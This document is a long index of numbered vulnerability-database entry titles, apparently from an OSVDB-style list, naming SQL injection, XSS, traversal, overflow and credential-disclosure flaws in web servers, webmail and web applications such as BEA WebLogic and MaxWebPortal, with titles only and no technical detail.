[20269] TWIG Webmail config.php Cookie Cleartext Authentication Credential Storage
[20249] eBASEweb Unspecified SQL Injection
[20240] WebX HTTP_REFERER Authentication Information Remote Disclosure
[20238] Webmin run.cgi Temp File Permission Weakness Arbitrary Command Execution
[20218] Macromedia JRun Unspecified WEB-INF / META-INF Privilege Escalation
[20204] MaxWebPortal db2000.mdb Remote Database Disclosure
[20190] Oracle Internet Application Server (IAS) WebDB/Portal Component mod_sql URL Query String SQL Injection
[20187] Oracle Internet Application Server (IAS) WebDB/Portal Component Port Listener HTTP Request DAD File Disclosure
[20151] RSA Authentication Agent for Web IISWebAgentIF.dll Redirect Overflow
[20114] BEA WebLogic Heavy CPU Load Audit Event Logging Severity Mismatch
[20113] BEA WebLogic Invalid Login Attempt Threshold Bypass
[20112] BEA WebLogic Servlet Relative Forwarding DoS
[20111] BEA WebLogic Incorrect Log Saturation Logging Failure
[20110] BEA WebLogic Multicast Message Cleartext Information Disclosure
[20109] BEA WebLogic weblogic.Deployer t3 Protocol Encryption Failure
[20108] BEA WebLogic Failed Login Administrator Account Lockout DoS
[20107] BEA WebLogic IIOP Protocol Subject Cleartext Password Disclosure
[20106] BEA WebLogic on Windows Registry Cleartext Password Disclosure
[20105] BEA WebLogic -D Switch Server Log Cleartext Credential Disclosure
[20104] BEA WebLogic fullyDelegateAuthorization Servlet Constraint Bypass
[20103] BEA WebLogic Configuration Wizard Private Key Passphrase Cleartext Disclosure
[20102] BEA WebLogic Cross Platform Ruleset Implementation Weakness
[20101] BEA WebLogic Unspecified Internal Servlet Arbitrary File Access
[20100] BEA WebLogic Servlet root URL Pattern Constraint Bypass
[20099] BEA WebLogic Derived Principal Privilege Escalation
[20098] BEA WebLogic nodemanager.config CustomTrustKeyStorePassPhrase Cleartext Disclosure
[20097] BEA WebLogic Internal IP Address Disclosure
[20096] BEA WebLogic WebApp/EJB run-as Security Role Privilege Escalation
[20095] BEA WebLogic Consecutive Non-SSL T3 Connection Encryption Failure
[20094] BEA WebLogic One-way SSL Session Encryption Failure
[20093] BEA WebLogic Multiple Unspecified XSS
[20092] BEA WebLogic Unspecified Thread Hang DoS
[20091] BEA WebLogic Open SSL Connection Saturation DoS
[20090] BEA WebLogic server.same Buffer Cleartext Password Disclosure
[20007] Ensim WEBppliance ocw_login_username Parameter XSS
[19933] WebGUI Asset.pm Asset Addition Arbitrary Code Execution
[19926] GFI MailSecurity HTTP Management Interface Request Header Overflow
[19898] Microsoft Windows Web View Arbitrary Script Injection
[19881] Sun Java System Directory Server Unspecified HTTP Admin Interface Issue
[19869] Webroot Desktop Firewall DeviceIoControl() Local DoS
[19868] Webroot Desktop Firewall PWIWrapper.dll FirewallNTService.exe Overflow
[19854] Symantec AntiVirus Scan Engine Administrative Interface HTTP Header Overflow
[19852] Forum Web Server postfile2.htm File Description Field XSS
[19851] Forum Web Server post1.htm Subject Field XSS
[19835] phpWebSite notes Module ANN_id SQL Injection
[19834] IBM Lotus Domino webadmin.nsf New Folder Dialog Traversal File Enumeration
[19833] SqWebMail Error Message Account Enumeration
[19832] BEA WebLogic NodeManagerMBean.CertificatePassword Password Disclosure
[19831] IceWarp WebMail help.html Traversal Arbitrary File Access
[19830] IceWarp WebMail logout.html Traversal Arbitrary File/Directory Deletion
[19829] IceWarp WebMail bwlist_inc.html Direct Request Path Disclosure
[19828] IceWarp WebMail calendar_w.html createdataCX Parameter XSS
[19827] IceWarp WebMail calendar_m.html createdataCX Parameter XSS
[19826] IceWarp WebMail calendar_d.html createdataCX Parameter XSS
[19825] IceWarp WebMail blank.html id Parameter XSS
[19816] Virtools Web Player Filename Traversal Arbitrary File Overwrite
[19815] Virtools Web Player Filename Processing Overflow
[19805] BEA WebLogic weblogic-rar.xml Password Encryption Information Disclosure
[19804] BEA WebLogic filerealm.properties Password Encryption Information Disclosure
[19803] BEA WebLogic config.xml Password Encryption Information Disclosure
[19801] BEA WebLogic Weblogic.admin JDBCConnectionPoolRuntimeMBean Cleartext Password Disclosure
[19800] BEA WebLogic CredentialMapper Cleartext Password Local Disclosure
[19765] Ganglia PHP RRD Web Client graph.php command Variable Arbitrary Command Execution
[19754] Mac OS Personal Web Sharing Long Password Overflow DoS
[19729] 4D WebSTAR IMAP MacOS Client Unspecified Potential DoS
[19714] Barracuda Spam Firewall web-ui Multiple CGI Unauthenticated Access
[19709] Apple Safari Remote Web Archive Processing XSS
[19663] ContentServ about.php ctsWebsite Parameter Traversal Arbitrary File Access
[19659] Twilight Utilities Web Server (TW-webserver) postfile.exe attfile Parameter Traversal Arbitrary File Access
[19658] Twilight Utilities Web Server (TW-webserver) postfile.exe attfile Variable Remote Overflow
[19641] Orion Web Server Error Page XSS
[19613] Spymac WebOS showthread.php Multiple Parameter XSS
[19593] Ingate Firewall/SIParator Default Route Interface Packet Spoofing
[19575] Webmin/Usermin miniserv.pl Metacharacter PAM Authentication Bypass
[19517] man2web man2html Arbitrary Command Execution
[19516] man2web man-cgi Arbitrary Command Execution
[19515] man2web man2web CGI Arbitrary Command Execution
[19498] CjWeb2Mail web2mail.php emsg Parameter XSS
[19497] CjWeb2Mail thankyou.php Multiple Parameter XSS
[19491] Content2Web index.php show Variable Arbitrary File Inclusion
[19490] Content2Web index.php show Variable Path Disclosure
[19489] Content2Web index.php show Parameter XSS
[19488] Content2Web index.php show Parameter SQL Injection
[19468] Mbedthis AppWeb Empty OPTIONS Request Remote DoS
[19465] vxWeb GET Request Overflow Remote DoS
[19438] Spymac WebOS index.php category Parameter XSS
[19381] PunBB Admin Interface Unspecified SQL Injection
[19309] Sun Java System Web Proxy Server Unspecified DoS (6291212)
[19308] Sun Java System Web Proxy Server ns-proxy Crafted POST Request DoS
[19307] Sun Java System Web Proxy Server Unspecified DoS (6264430)
[19283] WebCalendar functions.php includedir Parameter Remote File Inclusion
[19262] SqWebMail in MSIE Conditional Comments XSS
[19252] Nombas ScriptEase Webserver Edition viewcode.jse Traversal Arbitrary File Access
[19233] WEB//NEWS /actions Directory Multiple Script Path Disclosure
[19232] WEB//NEWS print.php id Parameter SQL Injection
[19231] WEB//NEWS news.php Multiple Parameter SQL Injection
[19230] WEB//NEWS startup.php Cookie SQL Injection
[19226] WebArchiveX ActiveX Multiple Method Arbitrary File Read/Write
[19225] Open WebMail Error Message Session ID XSS
[19204] Oracle Webcache OHS Encryption Specification Downgrade Weakness
[19200] Express-Web Content Management System default.asp email Parameter XSS
[19199] Express-Web Content Management System login.asp referer XSS
[19180] Macromedia Flash Player Web Page Termination Failure Remote DoS
[19178] Plug and Play Web Server FTP Service Multiple Command Remote Overflow DoS
[19173] Squid Web Proxy Cache @@ Security Control Bypass
[19158] BEA WebLogic Admin Console View Server Log XSS
[19150] Savant Web Server Registry Cleartext Password Disclosure
[19148] WebGUI WebGUI.pm Unspecified Arbitrary Perl Code Execution
[19147] WebGUI International.pm Unspecified Arbitrary Perl Code Execution
[19146] WebGUI Help.pm Unspecified Arbitrary Perl Code Execution
[19140] Beehive Forum Multiple Script $_GET webtag Parameter SQL Injection
[19105] OpenBSD PF Alternate Interface Rule Bypass
[19097] IBM Lotus Domino Web Server DOMLOG.NSF Logging HTTP Authenticate Header Overflow
[19091] phpWebNotes api.php t_path_core Parameter Remote File Inclusion
[19047] SqWebMail HTML Email img src Tag Arbitrary Script Insertion
[19025] IBM Tivoli WebSEAL Inactive Session Re-authentication Weakness On Failover
[19022] DSM Light Web File Browser explorer.php wdir Variable Arbitrary File Retrieval
[18967] NetworkActiv Web Server Traversal Arbitrary File Access
[18954] WebCalendar send_reminders.php includedir Parameter Remote File Inclusion
[18948] SqWebMail Attached File Arbitrary Script Insertion
[18936] SaveWebPortal Multiple HTTP Header Arbitrary Script Injection
[18935] SaveWebPortal menu_sx.php Multiple Parameter XSS
[18934] SaveWebPortal menu_dx.php Multiple Parameter XSS
[18933] SaveWebPortal header.php Multiple Parameter XSS
[18932] SaveWebPortal footer.php Multiple Parameter XSS
[18931] SaveWebPortal menu_sx.php CONTENTS_Dir Parameter Remote File Inclusion
[18930] SaveWebPortal menu_dx.php SITE_Path Parameter Remote File Inclusion
[18929] SaveWebPortal menu_sx.php Traversal Arbitrary File Access/Execution
[18928] SaveWebPortal menu_dx.php Traversal Arbitrary File Access/Execution
[18923] BEA WebLogic Portal User-Entitlement Crafted URL Bypass
[18855] BRS WebWeaver HTTP User-Agent Header Remote Overflow
[18810] LocalWEB2000 users.lst Cleartext Password Disclosure
[18799] phpWebSite index.php module Parameter SQL Injection
[18793] Apple Mac OS X Server Weblog Server Multiple Parameter XSS
[18792] Apple WebKit Safari Crafted PDF Arbitrary Command Execution
[18788] Apple Mac OS X SecurityInterface Password Assistant Recently-suggested Password Disclosure
[18759] IBM Tivoli WebSEAL Client Certification Authentication Login Restriction Bypass
[18724] IBM Tivoli SecureWay WebSEAL XSS Attempt Logging Failure
[18723] IBM Tivoli SecureWay WebSEAL user-and-group LDAP ACL Bypass
[18722] IBM Tivoli SecureWay WebSEAL Error Page XSS
[18665] Acunetix Web Vulnerability Scanner HTTP Sniffer Overflow DoS
[18611] Microsoft IE Web Folder Cross-Domain Code Execution
[18606] Microsoft Windows Telephony Application Programming Interface (TAPI) Overflow
[18562] Baby Web Server Arbitrary Remote File Write
[18525] NetworkActiv Web Server Parameter XSS
[18524] web content management AddModifyInput.php Remote Privilege Escalation
[18523] web content management List.php strTable Parameter XSS
[18522] web content management validsession.php strRootpath Parameter XSS
[18495] Metasploit Framework msfweb Defanged Mode Remote Bypass
[18465] McAfee WebShield Unspecified Default Account
[18345] Website Baker Media Upload Extension Validation Arbitrary Code Execution
[18344] Website Baker Multiple Unspecified Scripts Direct Request Path Disclosure
[18343] Website Baker browse.php Malformed Input Path Disclosure
[18342] Website Baker browse.php dir Parameter XSS
[18330] Thomson NETg Web Skill Vantage Manager Login SQL Injection
[18272] Beehive Forum Multiple Script $_GET webtag Parameter XSS
[18267] SPI Dynamics WebInspect Report Arbitrary Script Insertion
[18263] KeyFocus (KF) Web Server Traversal Arbitrary Directory Listing
[18225] Oracle 9iAS Web Cache Multiple Unspecified Overflows
[18163] Website Generator img_library.php Image Upload Preview Arbitrary PHP Code Execution
[18162] Website Generator banner_library.php theme Parameter XSS
[18161] Website Generator a.php theme Parameter XSS
[18160] Website Generator confirm.php theme Parameter XSS
[18159] Website Generator td.php theme Parameter XSS
[18158] Website Generator table.php theme Parameter XSS
[18157] Website Generator colorpicker.php theme Parameter XSS
[18156] Website Generator img_popup.php img_url Parameter XSS
[18155] Website Generator spaw_control.class.php Direct Request Path Disclosure
[18140] dxxo Count Web Statistics StatDay.asp Multiple Parameter SQL Injection
[18139] dxxo Count Web Statistics StatMonth.asp Multiple Parameter SQL Injection
[18138] dxxo Count Web Statistics StatYear.asp QYear Parameter SQL Injection
[18064] Novell GroupWise WebAccess E-Mail IMG SRC XSS
[18043] Oracle Web Conferencing HTTP Unspecified Information Disclosure
[17996] Sybase EAServer WebConsole jagadmin Default Account
[17995] Sybase EAServer WebConsole TreeAction.do Parameter Remote Overflow
[17987] punBB Admin Interface Multiple Unspecified SQL Injection
[17982] MailEnable Professional Webmail Printable Encoded Item DoS
[17981] MailEnable Professional Webmail Multiple Method Malformed Header DoS
[17884] IBM Lotus Notes Web Mail Attachment HTML Injection
[17881] WPS Web-Portal-System wps_shop.cgi art Parameter Arbitrary Command Injection
[17872] WebEOC Crafted URI Authentication Bypass
[17871] WebEOC Multiple Method Information Disclosure
[17870] WebEOC Multiple Unspecified SQL Injections
[17869] WebEOC Large File Upload Memory Consumption DoS
[17868] WebEOC Multiple Unspecified XSS
[17867] WebEOC Information Storage Encryption Weakness
[17866] WebEOC Shared Secret Key Arbitrary Installation Information Disclosure
[17860] Microsoft Windows NULL Session MSRPC Interface Remote eventlog Disclosure
[17859] Microsoft Windows NULL Session svcctl MSRPC Interface SCM Service Enumeration
[17854] Clearswift MIMEsweeper for Web ActiveX XML Encapsulation Filtering Bypass
[17850] Apple Darwin Streaming Server Web Admin Crafted MS-DOS Device Name Script DoS
[17826] IISWorks ASPWebMail Webmail.mdb Remote User Database Disclosure
[17818] Willing Webcam Registry Cleartext License Information Disclosure
[17791] SecureLinx SLC Console Manager Web Server Arbitrary File Download
[17790] phpWebSite Cookie SQL Injection
[17789] phpWebSite index.php Search Module mod Parameter Traversal Arbitrary File Access
[17788] phpWebSite index.php Search Module Multiple Parameter SQL Injection
[17623] VERITAS Backup Exec Web Admin Console (BEWAC) Local Overflow
[17603] Dynamic Biz Website Builder logon.asp Password Field SQL Injection
[17581] WebCalendar assistant_edit.php Unauthenticated Access
[17480] Savant Web Server Encoded Traversal Arbitrary Command Execution
[17463] Novell NetWare websinfo.bas Sample Application Information Disclosure
[17453] Dillo Web Browser FTP/Downloads dpis SMTP Security Issue
[17452] Dillo Web Browser html.c Unspecified Security Issue
[17451] Dillo Web Browser FTP Plugin Shell Escaping Code Issue
[17415] amaroK Web Frontend globals File Unspecified Issue
[17404] JBoss org.jboss.web.WebServer Class Version Disclosure
[17403] JBoss org.jboss.web.WebServer Class % File Request Source Disclosure
[17402] JBoss org.jboss.web.WebServer Class Crafted Request Path Disclosure
[17393] NanoBlogger Unspecified Traversal Arbitrary Weblog Directory Creation
[17388] Sun ONE Messaging Server Webmail XSS
[17382] Yaws Web Server Crafted URI Remote DoS
[17381] Yaws Web Server upload.yaws Unspecified Issue
[17380] Yaws Web Server Unspecified XSS
[17379] Yaws Web Server list_to_atom/1 Function Remote DoS
[17378] Yaws Web Server Unspecified XSS
[17377] Yaws Web Server Unspecified Security Bug
[17375] Yaws Web Server .yaws Script Null Byte Request Source Code Disclosure
[17309] Microsoft Windows Web Client Request Processing Remote Code Execution
[17307] Microsoft Exchange Outlook Web Access HTML Email XSS
[17299] Sun Java Web Start Untrusted Application Privilege Escalation
[17290] Webfresh Guest Book guest.cgi Name XSS
[17287] WebHints hints.pl Arbitrary Command Execution
[17252] IBM AIX diagTasksWebSM Command Line Argument Local Overflow
[17241] Novell NetMail WebAccess/WebMail Agent Folder Rename Overflow
[17240] Novell NetMail WebAccess iCal Module Calendar Display Field XSS
[17156] Sawmill Web Server Mode Crafted POST Request DoS
[17124] Microsoft IIS Malformed WebDAV Request DoS
[17110] Novell GroupWise webacc User.html Parameter Traversal Arbitrary File Access
[17106] WWWeb Concepts Events System login.asp Password Field SQL Injection
[17091] JavaMail API web.xml Server Information Disclosure
[17085] Popper Webmail childwindow.inc.php form Parameter Remote File Inclusion
[17084] LiteWeb Malformed URI Restricted File Access Bypass
[17041] IBM WebSphere Application Server (WAS) Administrative Console Authentication Overflow
[16981] Cherokee Web Server Port Bind Privilege Drop Weakness
[16980] Cherokee Web Server URI Traversal Arbitrary File Access
[16934] MyBulletinBoard (MyBB) usercp.php User Profile website Field XSS
[16917] NikoSoft WebMail Unspecified XSS
[16910] PicoWebServer Unicode HTTP Request Remote Overflow
[16888] NS WebMail Unspecified XSS
[16861] Athena Web athenareg.php pass Variable Command Execution
[16850] WEB-DAV Linux File System (davfs2) UNIX Permission Bypass
[16847] MaxWebPortal password.asp memKey Parameter SQL Injection
[16844] BEA WebLogic Server Console Returned Document XSS
[16843] BEA WebLogic Login Exception Authentication Failure Reason Disclosure
[16842] BEA WebLogic Active Directory LDAP Access Persistence
[16841] BEA WebLogic Authentication Provider Unspecified Privilege Escalation
[16840] BEA WebLogic Unspecified Remote DoS
[16839] BEA WebLogic LDAP Server Anonymous Bind
[16838] BEA WebLogic Server Console Login Page XSS
[16837] BEA WebLogic Malformed Cookie DoS
[16836] BEA WebLogic Failed Login Password Disclosure
[16835] BEA WebLogic User Sessions Persistence
[16834] BEA WebLogic Security Exception Disclosure
[16833] BEA WebLogic JDBC Connection Pool Unauthorized Access
[16831] Aborior Encore WebForum display.cgi file Variable Command Execution
[16805] Ipswitch IMail Web Calendaring Server GET Request Traversal Arbitrary File Access
[16748] WebAPP apage.cgi f Variable Arbitrary Command Execution
[16746] Gentoo webapp-config Temporary File Privilege Escalation
[16730] Willing Webcam ww.exe Local Password Disclosure
[16631] WebCT Campus Edition Multiple Tag XSS
[16621] Fastream NETFile FTP/Web Server Port Scan Bounce Weakness
[16620] Sigma ISP Manager sigmaweb.dll Malformed Input Error Message Information Disclosure
[16593] Savant Web Server Encoded Filename Request Authorization Bypass
[16592] Savant Web Server Malformed Content-Length DoS
[16591] Savant Web Server cgitest.exe Overflow DoS
[16590] Bajie HTTP Web Server Crafted Request File/Directory Disclosure
[16519] MaxWebPortal register.asp Multiple Parameter SQL Injection
[16518] MaxWebPortal privatesend_info.asp sendto Parameter SQL Injection
[16517] MaxWebPortal privatedelete.asp id Parameter SQL Injection
[16516] MaxWebPortal pop_profile.asp Multiple Parameter SQL Injection
[16515] MaxWebPortal pop_delete.asp ID-Numbers Parameter SQL Injection
[16514] MaxWebPortal pop_avatar_delete.asp Multiple Parameter SQL Injection
[16513] MaxWebPortal pop_announce_delete.asp A_ID Parameter SQL Injection
[16512] MaxWebPortal pm_view.asp id Parameter SQL Injection
[16511] MaxWebPortal pm_pop_privatesend_info.asp REPLY_ID Parameter SQL Injection
[16510] MaxWebPortal pm_delete2.asp Remove Parameter SQL Injection
[16509] MaxWebPortal pic_pop_share.asp Multiple Parameter SQL Injection
[16508] MaxWebPortal inc_function.asp FORUM_ID Parameter SQL Injection
[16507] MaxWebPortal inc_top.asp Name Parameter SQL Injection
[16506] MaxWebPortal pm_delete2.asp Multiple Parameter SQL Injection
[16505] MaxWebPortal pop_profile.asp Cookie Variables SQL Injection
[16504] MaxWebPortal search.asp andor Parameter SQL Injection
[16503] MaxWebPortal post_info.asp Multiple Parameter SQL Injection
[16502] MaxWebPortal inc_functions.asp fpassword Parameter SQL Injection
[16501] MaxWebPortal post.asp Multiple Parameter XSS
[16453] Jeuce Personal Web Server GET Request Overflow
[16433] Mozilla Java Applet Arbitrary Web Page Content Disclosure
[16427] Bugzilla URI Web Log Password Disclosure
[16374] Cherokee Web Server PRINT_ERROR() Function Local Format String
[16349] WebAPP Guestbook PRO Message Title XSS
[16336] PostMaster Web Mail Error Message Account Enumeration
[16318] MaxWebPortal custom_link.asp Multiple Parameter SQL Injection
[16317] MaxWebPortal pic_toprated.asp SQL Injection
[16316] MaxWebPortal links_toprated.asp SQL Injection
[16315] MaxWebPortal dl_toprated.asp SQL Injection
[16314] MaxWebPortal article_toprated.asp SQL Injection
[16313] MaxWebPortal pic_rates.asp SQL Injection
[16312] MaxWebPortal links_rate.asp SQL Injection
[16311] MaxWebPortal dl_rate.asp SQL Injection
[16310] MaxWebPortal article_rate.asp SQL Injection
[16309] MaxWebPortal pic_popular.asp SQL Injection
[16308] MaxWebPortal links_popular.asp SQL Injection
[16307] MaxWebPortal dl_popular.asp SQL Injection
[16306] MaxWebPortal article_popular.asp SQL Injection
[16304] Open WebMail (OWM) Shell Escape Arbitrary Command Execution
[16257] AJ Web Server Long URI Remote Overflow
[16256] Ashleys Web Server HTTP Request Overflow
[16213] IceWarp WebMail attachment.html File Enumeration
[16212] IceWarp WebMail calendar_task.html id Variable Path Disclosure
[16211] IceWarp WebMail calendar_event.html id Variable Path Disclosure
[16210] IceWarp WebMail calendar_addevent.html id Variable Path Disclosure
[16209] IceWarp WebMail calendarsettings.html Shared Calendars Parameter XSS
[16208] IceWarp WebMail settings.html Signature Parameter XSS
[16207] IceWarp WebMail addressaction.html XSS
[16206] IceWarp WebMail address.html Multiple Parameter XSS
[16198] YusASP Web Asset Manager assetmanager.asp
[16178] SimpleCam Web Server Traversal Arbitrary File Access
[16164] RSA SecurID Web Agent Remote Overflow
[16154] 4D WebSTAR Tomcat Plugin URL Remote Overflow
[16070] Web Crossing webx XSS
[16067] 04WebServer Traversal Arbitrary File Access
[16025] BEA WebLogic Memory Session Persistence Admin Authentication Bypass
[16014] IBM Web Traffic Express Caching Proxy Server HTTP GET Request XSS
[15993] MySQL MaxDB Webtool Remote getIfHeader() WebDAV Function Remote Overflow
[15914] Fastream NETFile FTP/Web Server Traversal Arbitrary File Access
[15910] Oracle webcacheadmin Multiple Parameter XSS
[15909] Oracle webcacheadmin Arbitrary File Corruption
[15908] Oracle Application Server Webcache Requests OHS mod_access Restriction Bypass
[15895] BEA WebLogic Administration Console JndiFramesetAction server Parameter XSS
[15894] JustWilliam's Amazon Webstore index.php Multiple Parameter XSS
[15893] JustWilliam's Amazon Webstore closeup.php image Parameter XSS
[15892] JustWilliam's Amazon Webstore Cookie Script Injection
[15844] WheresJames Webcam Publisher Remote Overflow
[15819] SqWebMail sqwebmail redirect Parameter CRLF Injection XSS
[15817] MySQL MaxDB Web Tool getLockTokenHeader() Function Remote Overflow
[15816] MySQL MaxDB Web Administration Service Malformed GET Request Overflow
[15805] Novell Nsure Audit webadmin.exe ASN.1 Message Parsing DoS
[15790] IBM WebSphere Application Server (WAS) Error Page XSS
[15747] XEROX WorkCentre MicroServer Web Server SNMP System Config Modification
[15732] Yawcam Web Server Traversal Arbitrary File Access
[15723] netMailshar Webmail Service Error Message Username Enumeration
[15722] netMailshar Webmail Service Traversal Arbitrary File Access
[15709] geneweb Maintainer Scripts Arbitrary File Manipulation
[15707] Microsoft Windows Explorer Web View Arbitrary Script Insertion
[15699] Sun Java System Web Proxy Server Unspecified Remote Overflow
[15668] WebCT Discussion Board Message Field XSS
[15667] Simple Web Server (SWS) GET Request Remote Overflow
[15666] WebcamXP User Name Overflow DoS
[15665] WebcamXP Chat Name XSS
[15637] Apple Mac OS X AppleWebKit Local Domain JavaScript Execution
[15589] Oracle PeopleSoft EnterpriseOne Web Applications Wide Impact Unspecified Issue
[15551] Kerio MailServer Webmail Unspecified Malformed E-Mail DoS
[15550] Webmin/Usermin Configuration File Permission/Ownership Modification
[15548] Usermin Web Mail Module Unspecified XSS
[15513] RSA Authentication Agent for Web for IIS IISWebAgentIF.dll XSS
[15504] Sun Java System Web Server Unspecified Remote DoS
[15501] IBM WebSphere Application Server (WAS) Malformed Host: Header JSP Source Disclosure
[15450] iWebNegar Administrator Login Page SQL Injection
[15449] iWebNegar comments.php SQL Injection
[15438] Oracle Web Cache HTTP Request Method Header Overflow
[15434] KDE KMail User Interface HTML Overlay Spoofing
[15409] PHP-Nuke Web_Links show Variable Path Disclosure
[15408] PHP-Nuke Web_Links Multiple Parameter SQL Injection
[15398] PHP-Nuke Web_Links Module Multiple Parameter XSS
[15394] PALS Library System WebPALS pals-cgi Arbitrary Command Execution
[15391] Webfroot shoutbox.php conf Parameter Traversal Arbitrary File Access
[15381] BEA WebLogic Server JMS Domain Routing User Password Disclosure
[15380] BEA WebLogic config.cmd Log File Admin Credential Cleartext Disclosure
[15354] WebWasher CSM Conf Script navTo2 Parameter XSS
[15320] Logics Software logwebftbs2000.exe Arbitrary File Access
[15319] IBM Lotus Domino Web Service NLSCCSTR.DLL Malformed GET Request Overflow DoS
[15255] Spymac WebOS network.php tos Parameter XSS
[15254] Spymac WebOS newpoll.php Multiple Parameter XSS
[15253] Spymac WebOS manager.php Multiple Parameter XSS
[15252] Spymac WebOS newthread.php Multiple Parameter XSS
[15251] Spymac WebOS newreply.php threadid Parameter XSS
[15250] Spymac WebOS threadlist.php catid Parameter XSS
[15249] Spymac WebOS showthread.php threadid Parameter XSS
[15248] Spymac WebOS notes.php Multiple Parameter XSS
[15247] Spymac WebOS upload_picture.php poll Parameter XSS
[15246] Spymac WebOS show_pics.php Multiple Parameter XSS
[15245] Spymac WebOS show_photo.php picid Parameter XSS
[15244] Spymac WebOS member.php memberid Parameter XSS
[15243] Spymac WebOS index.php Multiple Parameter XSS
[15236] Turnkey Websites SearchResults.php Multiple Parameter SQL Injection
[15225] MaxWebPortal Personal Message SendTo Parameter XSS
[15202] Cisco Storage Router Gigabit Interface Fragmented Packet DoS
[15197] MaxWebPortal events_functions.asp EVENT_ID Parameter SQL Injection
[15196] MaxWebPortal links_add_form.asp Banner XSS
[15182] WebCalendar username SQL Injection
[15118] FastStone 4in1 Browser Web Server Traversal Arbitrary File Access
[15105] web-app.org WebAPP Encoded Request .dat File Disclosure
[15062] IceWarp WebMail calendar.html Path Disclosure
[15061] IceWarp WebMail Multiple File Weak User Info Encryption
[15022] Boa Web Server Direct Request Arbitrary File Access
[14992] MCPWS Personal Webserver Malformed File Request DoS
[14930] SurgeMail Webmail attach_id Variable Traversal Arbitrary File / Directory Write
[14899] Sun Java Web Start JNLP File Arbitrary Command Execution
[14821] HP JetDirect JetAdmin Telnet Interface Password Sync Issue
[14806] GoodTech Telnet Server Admin Web Server Remote Overflow
[14799] ArbitroWeb rawurl Parameter XSS
[14798] eXtropia Web Store web_store.cgi page Parameter Command Execution
[14792] eXtropia Web Store html_web_store.cgi Traversal Arbitrary File Access
[14772] IBM WebSphere Commerce ResetPassword Servlet Caching Information Disclosure
[14767] MaxDB/SAP DB Web Agent Multiple Function Remote DoS
[14747] Spinworks Web Server Malformed sid Parameter DoS
[14726] WebGUI ENV HTTP Variable Spoofing
[14725] WebGUI DataForm Field Manipulation Information Disclosure
[14724] WebGUI Crafted URL Arbitrary Post Edit
[14722] WebGUI Denied Post Security Issue
[14721] WebGUI File Manager Direct Access Arbitrary File Access
[14720] WebGUI Nt Login Name Authentication Bypass
[14719] WebGUI Collateral Manager Arbitrary Collateral Deletion
[14718] WebGUI Collateral.pm Arbitrary Collateral Deletion
[14717] WebGUI Error Message Admin Username Information Disclosure
[14716] WebGUI Registered User Unspecified Privilege Escalation
[14715] WebGUI LDAP Authentication Invalid Password Bypass
[14714] WebGUI Unauthorized User Setting Edit
[14713] WebGUI Unspecified Macro Processing Security Issue
[14712] WebGUI Unspecified Attachment Issue
[14711] WebGUI Poll Unauthorized Vote
[14698] Novell NetMail Modweb Agent Unspecified Overflow
[14659] XEROX Document Centre Web Server Unspecified Unauthorized Access
[14658] XEROX MicroServer Web Server Directory Navigation Crafted URL DoS
[14642] Active WebCam Connection Saturation DoS
[14641] Active WebCam Error Message File Existence Enumeration
[14640] Active WebCam Nonexistent File Path Disclosure
[14639] Active WebCam Filelist.html Request DoS
[14638] Active WebCam Floppy Disk Request DoS
[14636] WEBInsta Mailing List Manager initdb.php Remote File Inclusion
[14630] phpWebLog Links Addon index.php Remote File Inclusion
[14629] phpWebLog init.inc.php Remote File Inclusion
[14579] XEROX WorkCentre MicroServer Web Server Unspecified Restriction Bypass
[14535] WebEasyMail POP3 Service Error Message Account Enumeration
[14534] WebEasyMail SMTP Service Request Format String
[14527] GeneWeb Daemon Crafted Request Arbitrary File Access
[14524] iPlanet WebServer Admin Server Perl Script open() Function Arbitrary Command Execution
[14523] Sun iPlanet WebServer Admin Server Error Log XSS
[14521] Courier sqwebmail Startup Sequence Arbitrary File Access
[14516] Xeneo Web Server Malformed GET Request DoS
[14514] Simple Web Server (SWS) Multiple Slash Arbitrary Restricted File Access
[14511] WebServer 4 Everyone HTTP GET Request Remote Overflow
[14486] IC9 Pocket Print Server Admin Web Server Long Password DoS
[14485] DB4Web Server Debug Mode TCP Port Scanning Proxy
[14484] DB4Web Server db4web_c Filename Request Traversal Arbitrary File Access
[14483] Brother NC-3100h Printer Admin Web Server Password Overflow
[14479] KeyFocus (KF) Web Server Malformed HTTP Header Overflow
[14477] 4D Web Server Long HTTP Request Overflow
[14472] EMUMAIL Webmail emumail.cgi Path Disclosure
[14448] Falcon Web Server Malformed URL Restricted File Access
[14438] Critical Path inJoin iCon Admin Web Server LOG Parameter Absolute Path Arbitrary File Access
[14419] 4D WebServer HTTP Basic Authentication Multiple Parameter Overflows
[14407] Galacticomm Worldgroup Web Server Crafted HTTP GET Request Parsing Overflow
[14344] Falcon Web Server Malformed URL Restricted File Authentication Bypass
[14334] BRS WebWeaver HTTP Server Password Protection Bypass
[14268] Beck IPC GmbH IPC@Chip Web Server chipcfg.cgi Direct Request Information Disclosure
[14266] Beck IPC GmbH IPC@Chip Web Server Long HTTP Request DoS
[14252] Web Server 4D/eCommerce Traversal Arbitrary File Access
[14240] WebMod server.cpp Malformed POST Query Content-Length Overflow
[14237] CIS WebServer Traversal Arbitrary File Access
[14228] ELSA Lancom Office Web Admin Server Admin Password Remote Disclosure
[14211] phpWebSite Search Module Path Disclosure
[14173] WEBsweeper Unicode Filter Bypass
[14172] WEBsweeper Malformed SCRIPT Tag Filter Bypass
[14143] Webridge PX Application Suite Malformed Request Information Disclosure
[14127] phpWebSite Image Announcement Upload Arbitrary Command Execution
[14116] Xcache Webserver Content-PageName Header Absolute Path Disclosure
[14101] phpMyAdmin /libraries/database_interface.lib.php Direct Request Path Disclosure
[14100] phpMyAdmin database_interface.lib.php cfg Parameter XSS
[14095] phpMyAdmin database_interface.lib.php Local File Inclusion
[14010] WebConnect jretest.html Traversal Arbitrary File Access
[14009] WebConnect MS-DOS Device Name Request DoS
[14006] Xinkaa WEB Station Traversal Arbitrary File Access
[13997] Kebi WebMail /a/ Directory Remote Privilege Escalation
[13963] Beck IPC GmbH IPC@Chip Embedded-Webserver Server Root Arbitrary File Access
[13962] iPlanet Web Server HTTP Request Long Method Name Overflow
[13961] OReilly WebBoard Pager Paging Function Malformed Javascript DoS
[13918] WebCalendar login.php webcalendar_session Cookie SQL Injection
[13885] Netcruiser Web Server Device Name URL Path Disclosure
[13882] WEBsweeper Large HTTP Referrer: Header Handling Remote Memory Exhaustion DoS
[13880] BRS WebWeaver FTP Server Malformed CD / ls Command Parsing Path Disclosure
[13868] Caucho Resin Malformed WEB-INF Specifier Javabean File Source Disclosure
[13860] WebReflex HTTPd Long HTTP GET Request Overflow
[13843] HP Web-enabled Management Software HTTP Server Remote Overflow
[13830] PHP-Nuke Web_Links Module newlinkshowdays Parameter XSS
[13828] PHP-Nuke Web_Links Module Path Disclosure
